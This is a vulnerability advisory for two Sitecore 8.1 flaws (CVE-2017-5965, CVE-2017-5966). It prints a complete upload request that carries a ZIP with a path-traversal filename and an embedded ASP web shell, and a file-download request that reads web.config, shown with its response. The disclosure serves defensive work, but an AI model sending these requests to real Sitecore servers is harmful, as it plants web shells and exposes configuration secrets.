Skip to main content

Authenticated Arbitrary File Upload via Sitecore Package Manager (CVE-2017-5965)

Chris McCurley
  • CVE(s) CVE-2017-5965, CVE-2017-5966
  • Vendor: Sitecore
  • Product: Sitecore
  • Version(s) affected: 8.1 Rev 151207
  • Fixed version: None

Authenticated Arbitrary File Upload via Sitecore Package Manager (CVE-2017-5965)
#

This vulnerability was subject to a 90-day disclosure timeframe after disclosure to vendor in February 2017.

Using the Sitecore administrator web console, it is possible to upload files to any location on the web server file system. This is due to the way the package manager handles ZIP files, containing the to-be installed package.

To replicate this issue, create a zip file with a malicious filename with ..\..\Website\sitecore\ in the filename. The example below provides a zip file containing a file named ..\..\Website\sitecore\asp-shell.asp. The Unzip parameter must be set to 1 to automatically unzip the archive once uploaded. The Overwrite parameter can be used if overwriting system files, e.g. web.config.

POST /sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=<RANDOM-GUID> HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/applications/install/dialogs/Upload%20Package/UploadPackage2.aspx?di=
Cookie: <..snip..>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------14217273362068279630257947421
Content-Length: 2160
<..snip..>
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Unzip"
1
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="Overwrite"
0
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326370957"; filename="asp-shell.zip"
Content-Type: application/zip
PK0[&Ió?Dõù’$..\..\Website\sitecore\asp-shell.aspUT    ÎW
ÎWuxö
RÛn›@}ç+¦+9²%ܤéC–RŒ+¶±€Êª©Â0n¨`¡»Kdûë;ËÅM#U}a™Ë9³gÎÚ&ã>ÜZFFR¤f,+pÀ-‹"æ)xGLj••ÜØŸî`'XE™f‡
Ó;¸¾µ¦Ÿ­ëéôƘLf†aŒ”a"²JMˆâ
é
ŒúûŸ˜¨!Û
n°ÜFføè­Vlô²Áÿ¢6^´óƒ§·Èr
Oò_¨–6ã?Ì®QaÑÖˆ@žÝõœÕ(©›ôSzy€a[²gÀØ¢ä€<GXTš‡0̽{fpu¹€ù€J—7qCQ»çy¯Ë
j
¿‰G+m‡\Ñÿ¬‹ûc˜Ž!5j¢‹N{çWÈ#<ª&?|‹ü8†EœK͡ѹ¸<mÏc´^Í
û‹?ÿFÇÂÖ'Ú]‡1(P½”©Ã¼ˆQ5ãU­@*t˜¢A
8IsšÌÎè|º
×8¯)gœNÌ`ö+ë}‘ºk¥EèK§sxô%8{n×yy&=AbA¡7ª—ô¾þUv5’fï
¦!¹Ú¼¥ììo¶5ºàsð„((k‚nHXS ¸*¹Ds'2
ý[ÒûòxR¦ØR™Æé}žL›róRb·†÷Í1G
:ú˝ÞÔ?¶ØVç‡ÕÚóPK0[&Ió?Dõù’$¤..\..\Website\sitecore\asp-shell.aspUTÎWuxöPKjW
-----------------------------14217273362068279630257947421
Content-Disposition: form-data; name="File326371057"; filename=""
Content-Type: application/octet-stream
-----------------------------14217273362068279630257947421--

After the file extraction has automatically completed, the web shell asp-shell.asp is accessible at https://sitecore-instance/sitecore/asp-shell.asp.

Authenticated Arbitrary File Download (CVE-2017-5966)
#

A web application administrator can download arbitrary files which exist outside of the web root directory. By design, the file parameter is populated with a GUID that represents a specific file stored within the application. However, by providing a full system path to any file within this parameter, it is possible to download the specified file (assuming the Sitecore application is running with appropriate privileges).

GET /sitecore/shell/download.aspx?file=c:\full\path\to\file\Web.config HTTP/1.1
Host: sitecore-instance
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitecore-instance/sitecore/shell/Applications/Reports/LogViewer
Cookie: <..snip..>
Connection: close

The HTTP response contains a portion of the requested web.config:

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24892
Content-Type: application/octet-stream; charset=utf-8
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename="Web.config"
Content-Transfer-Encoding: binary
X-UA-Compatible: IE=Edge,chrome=1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
x-frame-options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="sitecore" type="Sitecore.Configuration.ConfigReader, Sitecore.Kernel" />
    <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler, Sitecore.Logging" />
  <section name="packageInstallation" type="Sitecore.Ship.Infrastructure.Configuration.PackageInstallationConfiguration, Sitecore.Ship.Infrastructure" /><section name="nancyFx" type="Nancy.Hosting.Aspnet.NancyFxSection" /></configSections>
  <connectionStrings configSource="App_Config\ConnectionStrings.config" />
  <appSettings>
  (...REDACTED...)

Disclaimer
#

The information in this article is provided for research and educational purposes only. Aura Information Security does not accept any liability in any form for any direct or indirect damages resulting from the use of or reliance on the information contained in this article.